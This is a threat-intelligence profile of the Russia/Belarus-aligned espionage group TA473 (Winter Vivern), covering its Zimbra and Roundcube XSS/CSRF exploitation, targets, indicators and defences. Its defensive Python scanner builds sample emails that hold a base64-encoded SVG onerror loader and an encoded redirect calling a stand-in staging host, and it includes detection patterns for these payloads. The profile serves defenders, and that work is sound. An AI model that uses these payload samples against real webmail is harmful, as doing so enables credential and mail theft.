active threat profile
type: Nation-State
threat_level: High
status: Active
origin: Belarus / Russia — state-aligned (assessed)
last_updated: 2026-03-27

TA473 / Winter Vivern

also known as: Winter Vivern, UAC-0114, TAG-70, UNC4907

An espionage group aligned with Russian and Belarusian geopolitical objectives, distinguished by a highly methodical approach to webmail exploitation: use Acunetix to scan public-facing email portals for known unpatched CVEs, then engineer bespoke JavaScript payloads customized to each government target's specific webmail portal — CSRF attacks designed to steal usernames, passwords, and session tokens while appearing to execute on the legitimate server. TA473 does not lead in toolset sophistication but consistently succeeds through persistence and the scale of unpatched internet-facing infrastructure it finds available among NATO-aligned governments. In October 2023, the group escalated to zero-day territory — ESET documented TA473 exploiting CVE-2023-5631, an unpatched XSS in Roundcube's SVG handling — requiring only that a target view a malicious email to compromise their session.

attributed origin: Belarus / Russia — state-aligned (assessed)
first observed: 2020 (publicly attributed 2021)
primary motivation: Intelligence gathering — Ukraine war context
primary targets: NATO/EU Government, Military, Diplomatic, Telecom
signature technique: Per-target bespoke CSRF JavaScript — webmail XSS
zero-day use: CVE-2023-5631 Roundcube (Oct 2023)
recon tool: Acunetix vulnerability scanner
linked group: MoustachedBouncer (low confidence — ESET)
threat level: High

Overview

TA473 / Winter Vivern is a Belarus and Russia-aligned espionage group tracked by Proofpoint since 2021, also identified as UAC-0114 by the Ukrainian CERT and TAG-70 by Google Threat Intelligence. The group has been active since at least 2020 and has focused consistently on government, military, and diplomatic organizations in Europe and Central Asia — particularly those engaged with Russia's war against Ukraine. Proofpoint, SentinelLabs, ESET, the Polish CBZC, and Ukraine CERT have all published research on the group, reflecting its sustained operational profile across multiple threat intelligence organizations.

What distinguishes TA473 from other espionage groups operating against NATO targets is not technical sophistication — Proofpoint has explicitly noted that the group "does not lead the pack in sophistication among APT threats targeting the European cyber landscape." What it demonstrates instead is focus, persistence, and a repeatable process. The group's core workflow — scan internet-facing webmail portals with Acunetix, identify unpatched CVEs, engineer per-target bespoke JavaScript payloads that mimic the native webmail portal's own JavaScript to conduct CSRF attacks — is methodical and effective because it exploits a consistent defensive failure: organizations running public-facing webmail portals that have not been patched.

In October 2023, ESET documented TA473 exploiting CVE-2023-5631 — a zero-day XSS vulnerability in Roundcube's rcube_washtml.php that failed to sanitize malicious SVG documents before rendering them in HTML messages. By sending a crafted email with an SVG tag containing a base64-encoded payload, the group could inject arbitrary JavaScript into a target's webmail session with no manual interaction beyond viewing the message. ESET, which discovered the campaign, reported the zero-day to Roundcube on October 12, 2023; Roundcube patched it on October 14. This escalation to zero-day use represented a meaningful increase in TA473's operational capability relative to its prior 1-day/N-day exploitation pattern.

zero-interaction compromise — cve-2023-5631

CVE-2023-5631 required no user interaction beyond viewing an email in a browser-based Roundcube session. An SVG tag with a malicious base64-encoded payload in the onerror attribute injected JavaScript directly into the victim's webmail session. Importantly, this was a zero-day: even fully patched Roundcube instances were vulnerable when ESET discovered the campaign on October 11, 2023. Roundcube patched the issue on October 14. This delivery mechanism — payload delivered via email content rendering, not attachment execution — bypasses traditional email attachment security controls entirely.

Webmail Exploitation Chain

TA473's attack methodology follows a consistent, repeatable process documented across multiple campaigns. The investment in per-target reconnaissance and custom payload engineering is the group's defining operational signature.

Phase 1
Acunetix Reconnaissance — Identify Vulnerable Portals

The group uses Acunetix — a commercial web application vulnerability scanner — to scan internet-facing webmail portals belonging to government and NATO-aligned organizations. The scan identifies which CVEs the portal is vulnerable to, which webmail software is running (Zimbra Collaboration Suite, Roundcube, etc.), and the specific version deployed. This reconnaissance phase determines whether a given target is viable before any phishing activity begins.

Phase 2
Webmail Portal Reverse Engineering — Bespoke JavaScript Development

After identifying a vulnerable portal, TA473 operators study that specific organization's webmail implementation — examining the native JavaScript that runs in the portal, the specific parameter structures, login flow, and session token handling. The group then engineers a custom JavaScript payload specifically designed for that target's portal. Proofpoint noted: "Rather than developing a one-size-fits-all tools and payloads approach, TA473 invests time and resources to compromise specific entities with each JavaScript payload being custom for the targeted webmail portal." The payload closely emulates the portal's own JavaScript to avoid triggering anomaly detection.

Phase 3
Phishing Email Delivery — Exploit URL in Body

Phishing emails are sent from compromised email addresses — frequently originating from unpatched or insecure WordPress-hosted domains. The sender is spoofed to appear as someone from the target organization or a relevant peer organization involved in the Russia-Ukraine diplomatic context. The email body contains what appears to be a benign URL (a legitimate government resource or organizational document), but this URL is hyperlinked to a malicious exploit URL that appends the JavaScript payload as an error parameter to the vulnerable webmail domain.

Phase 4
XSS Exploit Execution — CSRF Credential and Token Theft

When the target clicks the hyperlinked URL, the browser navigates to the attacker-controlled or exploit URL and executes the malicious JavaScript in the context of the target's webmail portal session. The CSRF JavaScript replicates the portal's own authentication behavior, silently capturing the username, password (if the user re-authenticates), and active session CSRF tokens from cookies. These are then exfiltrated to attacker-controlled infrastructure. Stolen credentials and session tokens allow TA473 to log into the victim's webmail account and access their email — or conduct further lateral phishing from a legitimate internal address.

Alt: Zero-Day
Email-Borne XSS — CVE-2023-5631 (No Click Required)

In the October 2023 Roundcube zero-day campaign: a specially crafted email with a malicious SVG tag in the HTML source was sent to targets. Roundcube's rcube_washtml.php script failed to sanitize the SVG before rendering it in the HTML page. The SVG contained an image tag with an invalid href and an onerror attribute containing a base64-encoded JavaScript payload — when the href failed to load, the onerror fired, executing the JavaScript. No user interaction beyond opening the email in a browser-based Roundcube session was required. The second-stage payload (checkupdate.js) was loaded from an attacker-controlled server and exfiltrated email messages to the group's C2.

Target Profile

TA473's targeting is explicitly aligned with intelligence collection priorities relating to the Russia-Ukraine war and NATO's response to Russian foreign policy — making target selection highly predictable relative to geopolitical events.

  • NATO-aligned European governments: Foreign ministries, defense ministries, and diplomatic missions across NATO member states are documented targets. Poland, Lithuania, Slovakia, Germany, France, and Italy have been identified in public reporting. The common thread is organizations involved in or engaged with Ukraine-related policy, NATO coordination, or European defense planning.
  • Military and defense entities: Military personnel and defense organizations are targeted for communications relating to weapons supply, troop support, and strategic military coordination with Ukraine. SentinelLabs documented targeting of Polish government agencies and Ukraine's Ministry of Foreign Affairs among others.
  • Diplomatic missions and embassies: Diplomatic staff — particularly those involved in Russia-Ukraine diplomacy, sanctions coordination, or NATO enlargement discussions — are high-value collection targets. The group has targeted diplomatic personnel in contexts including the Vatican (previously documented as a geopolitically sensitive target given its diplomatic relationships).
  • US elected officials and staffers: Proofpoint documented TA473 campaigns targeting US elected officials and their staffers from late 2022 and into 2023 — an expansion beyond the primarily European diplomatic focus into US domestic political targets engaged with Ukraine policy, foreign aid, and NATO commitments.
  • Think tanks and policy research organizations: Organizations conducting research or publishing on European politics, economics, and NATO-Russia relations are targeted as a source of intelligence on policy deliberations before they become official positions.
  • Telecommunications providers: Through 2024–2025, Brandefense documented TA473 expanding targeting to defense contractors and satellite communication providers — reflecting collection interest in communications infrastructure supporting Ukraine-related operations.
  • Ukraine and Central Asia: Ukraine itself — government agencies and ministries — remains a core target. The group also operates against Central Asian governments, consistent with Russian intelligence collection priorities across the former Soviet space.

Tactics, Techniques & Procedures

TA473's TTP set is narrow and repeatable — the group's strength is consistency and persistence, not breadth of capability. The webmail XSS exploitation chain is the core of the operation, supplemented by traditional phishing for broader credential collection.

  • T1592 (Reconnaissance — Acunetix Vulnerability Scanning): TA473 uses Acunetix — a commercial web application vulnerability scanner — to identify unpatched CVEs in internet-facing webmail portals belonging to target organizations. This reconnaissance phase determines vulnerability status before any phishing activity begins, ensuring the group only invests in per-target JavaScript payload engineering when a viable exploit vector exists. The use of a commercial scanner makes reconnaissance activity harder to attribute than custom scanning tools.
  • T1190 (Exploit Public-Facing Application — Webmail XSS): The group exploits reflected and stored XSS vulnerabilities in public-facing Zimbra and Roundcube webmail installations — CVE-2022-27926 (Zimbra reflected XSS), CVE-2020-35730 (Roundcube XSS), CVE-2023-37580 (Zimbra XSS zero-day via Github hotfix), and CVE-2023-5631 (Roundcube SVG parsing zero-day). XSS vulnerabilities in webmail allow arbitrary JavaScript execution within the victim's authenticated browser session — providing access to session cookies, CSRF tokens, and the ability to submit authenticated requests as the victim.
  • T1185 (Browser Session Hijacking — CSRF Token Theft): TA473's bespoke JavaScript payloads conduct cross-site request forgery attacks within the victim's active webmail session. The JavaScript replicates the native portal's authentication flow, captures usernames, passwords, and active CSRF tokens from session cookies, then exfiltrates them to attacker-controlled infrastructure. The stolen CSRF token allows the attacker to submit authenticated requests to the victim's webmail account — reading, downloading, or forwarding email — without requiring the victim's credentials again.
  • T1566.002 (Spearphishing — Link to Exploit URL): Phishing emails contain a hyperlinked URL where the visible text shows a benign government or organizational link, but the underlying href points to an exploit URL. The exploit URL uses the target organization's own webmail domain (which is running a vulnerable Zimbra or Roundcube instance) with an appended JavaScript payload as an error parameter. The URL structure often includes a hash value specific to the targeted individual and an unencoded reference to the target organization — indicating per-recipient URL customization.
  • T1078 (Stolen Credentials — Lateral Phishing): Compromised webmail accounts can be used for lateral phishing — sending malicious emails from the victim's legitimate organizational address to colleagues and contacts. This extends the group's reach into organizations where external phishing would be blocked or suspicious. ESET noted that exploiting access to compromised accounts to conduct lateral phishing attacks is documented in TA473's operational playbook.
  • T1059.001 (PowerShell Backdoor — Non-Webmail Campaigns): Beyond the webmail exploitation chain, TA473 has deployed a custom PowerShell backdoor in some campaigns — documented by SentinelLabs and the State Cyber Protection Centre of Ukraine. The PowerShell backdoor provides persistent access to endpoint systems beyond the webmail session access that CSRF exploitation provides. Phishing documents delivering PowerShell payloads are used in campaigns targeting organizations or individuals not running vulnerable webmail portals.
  • T1027 (Base64 Encoding — JavaScript Obfuscation): TA473 employs multiple layers of Base64 encoding in its JavaScript payloads — both in the CVE-2023-5631 SVG exploit (where the payload is base64-encoded in the SVG's onerror attribute) and in earlier Zimbra CSRF payloads. Proofpoint noted that "the attackers employed several layers of Base64 encoding for JavaScript obfuscation, however, the experts pointed out that decoding the script is trivial." The obfuscation is primarily intended to bypass simple signature-based detection, not to resist analysis.
  • T1598 (Phishing for Information — Credential Harvesting Pages): Alongside webmail exploitation, TA473 operates credential harvesting campaigns using phishing websites that replicate government portal login pages. These campaigns target credentials for organizations whose webmail portals are not vulnerable to the group's known CVE inventory — providing a broader collection capability beyond the XSS exploitation chain.

Known Campaigns

Selected operations across TA473's documented history, illustrating the consistent webmail exploitation methodology and its progressive escalation from N-day exploitation to zero-day use.

Early Operations — European Government Phishing (2020–2022)

TA473's earliest documented campaigns, first identified by DomainTools in 2021, focused on government entities in Azerbaijan, Cyprus, India, Italy, Lithuania, Ukraine, and the Vatican using malicious documents and phishing websites delivering PowerShell payloads. The group used the Follina exploit (CVE-2022-30190) opportunistically when disclosed in May 2022 — indicating an established practice of adopting publicly disclosed vulnerabilities rapidly. These early campaigns established the group's consistent focus on European diplomatic and government targets before the more specialized webmail exploitation methodology became the primary approach.

Zimbra CVE-2022-27926 — NATO Webmail Access (Feb–Mar 2023)

Proofpoint documented TA473 continuously exploiting CVE-2022-27926 — a reflected XSS vulnerability in Zimbra Collaboration Suite 9.0.0 — against government entities in Europe from at least February 2023. The group used Acunetix to identify government portals running vulnerable Zimbra installations, then delivered phishing emails with malicious URLs appending Base64-encoded JavaScript snippets to the Zimbra error parameter. Custom CSRF JavaScript payloads were engineered for each target's specific portal configuration, capturing usernames, passwords, and CSRF tokens. Targets documented or assessed in public reporting included NATO military and diplomatic personnel across multiple European countries, US elected officials and staffers, and policy experts in European politics and economics. The goal was assessed as accessing emails related to the Russia-Ukraine war from government officials across Europe.

Zimbra CVE-2023-37580 — Zero-Day from Github Hotfix (Jun–Aug 2023)

Google TAG discovered Winter Vivern (UNC4907) exploiting CVE-2023-37580 — a reflected XSS zero-day in Zimbra — in June 2023, before the official patch was released. Notably, the group began exploiting the vulnerability after Zimbra pushed a hotfix to their public GitHub repository on July 5, 2023 but before the official advisory was published — meaning TA473 discovered the vulnerability by monitoring Zimbra's GitHub commits. The campaign targeted European government organizations. TAG documented that multiple groups exploited this same vulnerability, with Winter Vivern's campaign deploying malware from applicationdevsoc[.]com/zimbraMalwareDefender/zimbraDefender.js.

Roundcube CVE-2020-35730 — European Governments (Aug–Sep 2023)

ESET documented TA473 exploiting CVE-2020-35730 — a known XSS vulnerability in Roundcube — in August and September 2023 against European governmental entities. This campaign demonstrated the group's parallel capability against Roundcube webmail in addition to Zimbra, and its willingness to exploit older known vulnerabilities against organizations that had not applied patches issued years earlier.

Roundcube Zero-Day CVE-2023-5631 — European Governments and Think Tank (Oct 2023)

TA473's most significant documented capability escalation. ESET discovered the group exploiting CVE-2023-5631 — an unpatched XSS zero-day in Roundcube's rcube_washtml.php SVG sanitization — on October 11, 2023. Malicious emails sent from team.managment@outlook[.]com with the subject "Get started in your Outlook" contained an SVG tag in the HTML source with a base64-encoded payload in an onerror attribute. Opening the email in a Roundcube webmail session was sufficient to execute the payload — no click, no attachment interaction required. The payload loaded a second-stage JavaScript (checkupdate.js) from an attacker-controlled server, which exfiltrated email messages to the group's C2. ESET reported the zero-day on October 12; Roundcube patched it on October 14. Targets included governmental entities and a think tank, all in Europe.

Evolved Operations (2024–2025)

Brandefense documented continued TA473 evolution through 2024–2025: multi-layer staging servers used to conceal operator activity, more extensive use of cloud-based email evasion and HTML smuggling, targeted attacks against defense contractors and satellite communication providers, integration of MFA bypass phishing components, and increased anti-analysis features in web shells and loaders. The group began using AI-assisted content generation to create more authentic multilingual phishing lures — improving the quality and language accuracy of social engineering content directed at targets across multiple European language groups.

Tools & Malware

TA473's toolkit is limited compared to more sophisticated state-sponsored groups — reflecting a capability model built around process and persistence rather than proprietary tooling investment.

  • Acunetix (commercial): A commercial web application vulnerability scanner used by TA473 to identify unpatched CVEs in internet-facing webmail portals. The use of a legitimate commercial tool makes scanning traffic harder to attribute — Acunetix scans appear similar to legitimate security testing activity in network logs.
  • Per-target CSRF JavaScript payloads: Custom JavaScript blocks engineered specifically for each target organization's webmail portal. The scripts replicate the portal's native JavaScript structure, conduct cross-site request forgery to capture authentication credentials and session tokens, and exfiltrate them to attacker-controlled infrastructure. Proofpoint identified multiple distinct JavaScript variants tailored to different Zimbra and Roundcube portal configurations. Base64 encoding is used for simple obfuscation.
  • CVE-2023-5631 SVG-based payload (checkupdate.js): A two-stage exploit chain specific to the October 2023 Roundcube zero-day campaign. Stage 1: a malicious SVG tag embedded in the email HTML containing a base64-encoded payload in an onerror attribute. Stage 2: the onerror fires and fetches checkupdate.js — a JavaScript loader — from an attacker-controlled server. The loader executes within the Roundcube session and exfiltrates email messages to the C2.
  • Custom PowerShell backdoor: Documented in earlier campaigns by SentinelLabs and CERT-UA. Provides persistent endpoint access beyond webmail session access — used in campaigns against organizations not running vulnerable webmail portals or where endpoint persistence is required beyond credential collection.
  • Compromised WordPress infrastructure: TA473 sends phishing emails from compromised addresses originating from unpatched or insecure WordPress-hosted domains — leveraging the reputation of legitimate-looking website domains for email sending. The compromise of WordPress sites for C2 relay and phishing infrastructure is a consistent documented pattern.
  • Malicious documents (historical): Early campaigns delivered malicious documents exploiting Follina (CVE-2022-30190) and other Office vulnerabilities. This delivery vector became secondary as the webmail exploitation approach proved more reliable against the group's diplomatic target set.

Indicators of Compromise

TA473's most distinctive detection opportunities are the per-target URL structure of Zimbra exploit URLs and the Roundcube SVG payload pattern. Network-level detections for CSRF exfiltration are more complex given the legitimate-appearing traffic.

detection note — xss traffic mimics legitimate portal requests

TA473's CSRF JavaScript payloads are specifically engineered to replicate the legitimate webmail portal's own request patterns — making network-level detection difficult because malicious and legitimate traffic appear similar. Host-based detection in the webmail server's application logs, and email content scanning for SVG tags with onerror attributes containing base64 payloads, are more reliable detection paths than network traffic analysis alone.

indicators of compromise — url patterns and email content
url pattern: Zimbra exploit URL: [target webmail domain]/[error parameter][Base64 or hex-encoded JavaScript snippet]
url structure: Structured URI: hash of targeted individual + unencoded target org reference + encoded benign URL (Zimbra CVE-2022-27926 pattern)
email content: SVG tag in HTML email with onerror attribute containing base64-encoded payload — CVE-2023-5631 delivery signature
email content: Mismatch between displayed URL text (benign government resource) and actual hyperlink target (exploit URL)
c2 domain: applicationdevsoc[.]com — CVE-2023-37580 Zimbra campaign (Winter Vivern, attributed by Google TAG)
sender: team.managment@outlook[.]com — CVE-2023-5631 Roundcube zero-day campaign (ESET)
infrastructure: Compromised WordPress-hosted domains used as phishing email senders — unpatched CMS used for sending infrastructure
suricata rules: ET TROJAN Wintervivern Activity M4 (2034116) / M5 (2034117) / Retrieving Commands (2034115) — published by Proofpoint
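The two email-content signatures in the table above (the SVG tag with a base64-carrying onerror attribute, and the anchor whose visible URL text disagrees with an href pointing at the organization's own webmail domain with encoded script in the query), worked as an added example that is not code from the profile's sources or from any vendor tool. The webmail hostname, the error path and parameter name, and both sample messages are constructed for the demonstration.

```python
import base64
import binascii
import email
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urlparse

OWN_WEBMAIL_HOSTS = {"mail.example-gov.invalid"}   # assumption: the defender's own portal host(s)
EVENT_ATTRS = {"onerror", "onload"}                 # handlers that fire on render, with no click
B64_RUN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")   # base64 runs long enough to be worth decoding
SCRIPT_HINTS = ("document.", "window.", "xmlhttprequest", "fetch(", "eval(", "<script")
URL_TEXT = re.compile(r"^\s*(https?://|www\.)", re.I)  # visible anchor text that reads as a URL

def decodes_to_script(value):
    """True if any base64 run inside value decodes to text that looks like JavaScript."""
    for run in B64_RUN.findall(value):
        try:
            text = base64.b64decode(run + "=" * (-len(run) % 4)).decode("utf-8", "ignore")
        except (binascii.Error, ValueError):
            continue
        if any(hint in text.lower() for hint in SCRIPT_HINTS):
            return True
    return False

class TA473SignatureParser(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings, self._svg_depth, self._href, self._text = [], 0, None, []

    def handle_starttag(self, tag, attrs):
        attrs = {k.lower(): (v or "") for k, v in attrs}
        if tag == "svg":
            self._svg_depth += 1
        if self._svg_depth:   # any render-time handler inside <svg> is the CVE-2023-5631 shape
            for name in EVENT_ATTRS.intersection(attrs):
                self.findings.append({"kind": "svg_event_handler", "tag": tag, "attr": name,
                                      "encoded_script": decodes_to_script(attrs[name])})
        if tag == "a":
            self._href, self._text = attrs.get("href", ""), []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "svg" and self._svg_depth:
            self._svg_depth -= 1
        if tag == "a" and self._href is not None:
            self._check_anchor(self._href, "".join(self._text).strip())
            self._href = None

    def _check_anchor(self, href, shown):
        parsed = urlparse(href)
        href_host = (parsed.hostname or "").lower()
        if URL_TEXT.match(shown):   # visible text is itself a URL: does its host match the href?
            shown_host = (urlparse(shown if "://" in shown else "http://" + shown).hostname or "").lower()
            if shown_host and shown_host != href_host:
                self.findings.append({"kind": "link_text_mismatch", "shown": shown_host, "href": href_host})
        # Zimbra-style lure: href targets the victim's own portal with encoded script in the query.
        if href_host in OWN_WEBMAIL_HOSTS and decodes_to_script(unquote(parsed.query)):
            self.findings.append({"kind": "own_webmail_encoded_payload", "href": href_host})

def scan_message(raw):
    """Parse a raw RFC 5322 message and return findings from every text/html part."""
    findings = []
    for part in email.message_from_string(raw).walk():
        if part.get_content_type() == "text/html":
            html = part.get_payload(decode=True).decode(part.get_content_charset() or "utf-8", "ignore")
            parser = TA473SignatureParser()
            parser.feed(html)
            findings.extend(parser.findings)
    return findings

# Constructed samples, not captured artefacts; payload text is base64-encoded at runtime.
LOADER_B64 = base64.b64encode(b"var s=document.createElement('script');s.src="
                              b"'https://stage.example.invalid/checkupdate.js';document.head.appendChild(s)").decode()
SVG_SAMPLE = f"""From: sender@example.invalid
Content-Type: text/html; charset=utf-8

<p>Welcome.</p><svg><image href="x" onerror="eval(atob('{LOADER_B64}'))"/></svg>
"""
QUERY_B64 = base64.b64encode(b"window.location='https://stage.example.invalid/'").decode()
LINK_SAMPLE = f"""From: sender@example.invalid
Content-Type: text/html; charset=utf-8

<p>See <a href="https://mail.example-gov.invalid/error?msg={QUERY_B64}">https://docs.example-org.invalid/briefing.pdf</a></p>
"""
```

Running `scan_message` on the two samples yields one `svg_event_handler` finding with `encoded_script` true, and a `link_text_mismatch` followed by an `own_webmail_encoded_payload` finding respectively; a message whose anchor text and href share a host produces no findings.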

Mitigation & Defense

TA473's success depends on a single systematic defensive failure: unpatched public-facing webmail infrastructure. Patch management for internet-accessible webmail portals is the most impactful single control against this group.

  • Patch Zimbra and Roundcube immediately and continuously: The group's entire primary attack chain depends on unpatched webmail portals. CVE-2022-27926 was patched in Zimbra 9.0.0 Patch 24 — over a year before TA473's documented exploitation. CVE-2023-5631 was patched by Roundcube within 48 hours of ESET's report. Organizations running current Zimbra and Roundcube versions would have been immune to the documented CVE-based attack chains. Establish a dedicated patch cycle for all internet-facing applications — particularly webmail — separate from internal system patching, with critical security patches applied within 24–72 hours of release.
  • Monitor the GitHub hotfix gap: TA473 exploited CVE-2023-37580 by detecting Zimbra's GitHub hotfix before the official advisory. Subscribe to GitHub release monitoring for all deployed internet-facing software. Treat a hotfix or security commit appearance in a vendor's public repository as equivalent to a published CVE — apply immediately without waiting for official release notes.
  • Restrict internet access to webmail portals where feasible: Proofpoint and CSO Online both explicitly recommend restricting public internet access to webmail portals for organizations in TA473's target category. VPN-gated webmail access eliminates the external attack surface that Acunetix scanning identifies. Where fully restricting public access is not operationally feasible, geo-blocking access from geographic regions with no legitimate user base reduces attack surface.
  • Block SVG tag rendering in webmail HTML: The CVE-2023-5631 exploit relied on Roundcube rendering an SVG tag with an onerror attribute from email HTML content. Configure webmail content security policies (CSP) to block SVG rendering from email content. Many enterprise email gateway configurations already strip or neutralize SVG content — verify that your Roundcube deployment applies content sanitization before rendering.
  • Email content scanning for exploit URL patterns: TA473's phishing emails contain a distinctive structure: visible benign URL text hyperlinked to a different underlying URL that targets the organization's own webmail domain with appended JavaScript parameters. Deploy email gateway rules that flag messages where the visible link text and the underlying href target differ, particularly where the href includes the target organization's own domain with query string parameters.
  • Multi-factor authentication on all webmail: Even if CSRF JavaScript successfully captures a username, password, and session CSRF token, MFA-enforced webmail accounts cannot be accessed from attacker-controlled infrastructure using stolen credentials alone. MFA does not prevent the CSRF attack from executing within the victim's own browser session, but it prevents the stolen credentials from being used by the attacker to independently log in from their own infrastructure. This significantly limits the value of stolen credentials while not preventing all impact.
  • Application-layer logging for webmail request anomalies: TA473's CSRF payloads submit authenticated requests that mimic legitimate portal behavior — making network-level detection difficult. Implement webmail application-layer logging that captures unusual request patterns: authentication attempts from unexpected source IPs using fresh CSRF tokens, bulk email downloads within a session, or multiple mail export requests in a short window. Alert on sessions where the CSRF token changes or where post-authentication activity volume spikes abnormally.
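The application-layer logging bullet above, worked as an added example that is not code from the profile's sources or from Zimbra or Roundcube: it flags a session token presented from a second client address and a burst of mail-export requests inside a five-minute window. The log layout and every event in it are constructed; a real deployment would swap in a parser for the portal's own access log.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed log layout (not a real Zimbra or Roundcube format):
# "<ISO-8601 time> sess=<session id> ip=<client ip> action=<verb>"
SAMPLE_LOG = """\
2023-10-12T09:14:02Z sess=s-41aa ip=203.0.113.10 action=login
2023-10-12T09:15:30Z sess=s-41aa ip=203.0.113.10 action=read
2023-10-12T09:21:08Z sess=s-41aa ip=198.51.100.7 action=read
2023-10-12T09:21:15Z sess=s-41aa ip=198.51.100.7 action=export
2023-10-12T09:21:40Z sess=s-41aa ip=198.51.100.7 action=export
2023-10-12T09:22:03Z sess=s-41aa ip=198.51.100.7 action=export
2023-10-12T09:30:00Z sess=s-77bc ip=203.0.113.22 action=login
2023-10-12T09:31:10Z sess=s-77bc ip=203.0.113.22 action=read
2023-10-12T10:02:00Z sess=s-77bc ip=203.0.113.22 action=export
"""

BULK_ACTIONS = {"export", "download"}   # verbs that pull mail out of the mailbox in bulk

def parse_log(text):
    """Turn the constructed log lines into dicts with a parsed timestamp."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, *fields = line.split()
        ev = dict(f.split("=", 1) for f in fields)
        ev["time"] = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")
        events.append(ev)
    return events

def sessions_with_ip_change(events):
    """Sessions whose token was presented from more than one client IP: a stolen
    session or CSRF token replayed from infrastructure the user never used."""
    ips = defaultdict(list)
    for ev in events:
        if ev["ip"] not in ips[ev["sess"]]:
            ips[ev["sess"]].append(ev["ip"])
    return {sess: addrs for sess, addrs in ips.items() if len(addrs) > 1}

def sessions_with_export_burst(events, threshold=3, window=timedelta(minutes=5)):
    """Sessions issuing at least `threshold` bulk requests inside any sliding window."""
    per_session = defaultdict(list)
    for ev in events:
        if ev["action"] in BULK_ACTIONS:
            per_session[ev["sess"]].append(ev["time"])
    flagged = {}
    for sess, times in per_session.items():
        times.sort()
        for i, start in enumerate(times):
            in_window = [t for t in times[i:] if t - start <= window]
            if len(in_window) >= threshold:
                flagged[sess] = len(in_window)
                break
    return flagged

def analyze(text):
    """Run both detections and return the flagged sessions for each."""
    events = parse_log(text)
    return {"ip_change": sessions_with_ip_change(events),
            "export_burst": sessions_with_export_burst(events)}
```

On the sample, session s-41aa is reported under both detections (a second address mid-session, then three exports within a minute) while s-77bc, which stays on one address and exports once, is not.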

analyst note

ESET's observation — "a significant number of internet-facing applications are not regularly updated although they are known to contain vulnerabilities" — is the precise policy gap that TA473 exploits as a deliberate operational strategy. Proofpoint's characterization of the group as demonstrating "focus, persistence, and a repeatable process for compromising geopolitically exposed targets" is an accurate model: this is not a group that will innovate past strong patch management. The October 2023 zero-day use (CVE-2023-5631) was a notable escalation — the group had previously relied exclusively on known CVEs with public PoCs — but even that zero-day was patched within 48 hours and was exploited for only a brief window. ESET's low-confidence assessment that Winter Vivern is linked to MoustachedBouncer (a Belarus-aligned group) provides an interesting infrastructure connection to track. The group's 2024–2025 adoption of AI-assisted phishing lure generation and MFA bypass components reflects a pattern seen across Eastern European espionage actors: continued investment in capabilities that address the most common defensive improvements adopted by targets.

Sources & Further Reading

Attribution and references used to build this profile.
